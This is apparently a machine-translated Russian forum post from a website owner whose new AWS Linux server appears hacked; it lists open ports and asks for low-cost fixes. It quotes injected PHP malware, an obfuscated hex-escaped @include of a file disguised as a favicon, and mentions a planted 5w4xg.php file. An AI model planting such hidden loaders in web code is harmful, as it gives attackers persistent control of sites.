Сайт взломан или имеет вредоносное ПО
Я разработал новый веб-сайт, который я установил на новом сервере, и всего два дня назад указал домен на этот сервер.
Однако сейчас происходят странные вещи, например, переименование index.html в index.html.bak.bak и появление index.php.
Следующий код появляется в index.php, а в существующий index.php добавляется новый код, такой как:
php /6e980/
@include "\ x2fh \ x6fm \ x65 / \ x732 \ x61n \ x61l \ x79t \ x69c \ x73 / \ x70u \ x62l \ x69c \ x5fh \ x74m \ x6c / \ x54A \ x53c \ x65n \ x61r \ x69o \ x2fQ \ x75e \ x72y \ x2ff \ x61v \ x69c \ x6fn \ x5fa \ x365 \ x399 \ x65 \x69c\x6f".
/6e980/
echo file_get_contents ('index.html.bak.bak');
Внезапно я заметил папку, а именно форум создан с одиноким php-файлом с именем 5w4xg.php. Файлы JQuery становятся пустыми или содержат странные заголовки.
Это сервер Linux, работающий на AWS. Я думаю, что он либо был взломан, либо содержит вредоносное ПО.
Рекомендуется установить SSL - на сайте может быть SiteLock ( https://www.sitelock.com/) для регулярного сканирования файлов сайта и базы данных. - На сервере может быть установлен брандмауэр Comodo Web Application на сервере, который предотвратит атаки SQL и XSS. - Установите антивирус ClamAV для cPanel.
Пока кто-то говорит об установке SSL, ClamAV и Wordfence.
Я не знаю что делать?
У меня также открыты следующие порты:
TCP 21 0.0.0.0/0
TCP 21:: / 0
TCP 22 0.0.0.0/0
TCP 25 0.0.0.0/0
TCP 25:: / 0
TCP 53 0.0.0.0/0
TCP 53:: / 0
TCP 80 0.0.0.0/0
TCP 80:: / 0
TCP 110 0.0.0.0/0
TCP 110:: / 0
TCP 143 0.0.0.0/0
TCP 143:: / 0
TCP 443 0.0.0.0/0
TCP 443:: / 0
TCP 465 0.0.0.0/0
TCP 465:: / 0
TCP 587 0.0.0.0/0
TCP 587:: / 0
Мне нужны порты только для: а) загрузки файлов с моего рабочего места б) подключения к MySQL db в) почтовой системы для работы
Пожалуйста, посоветуйте, что я могу сделать, и что-то, что связано с минимальными затратами.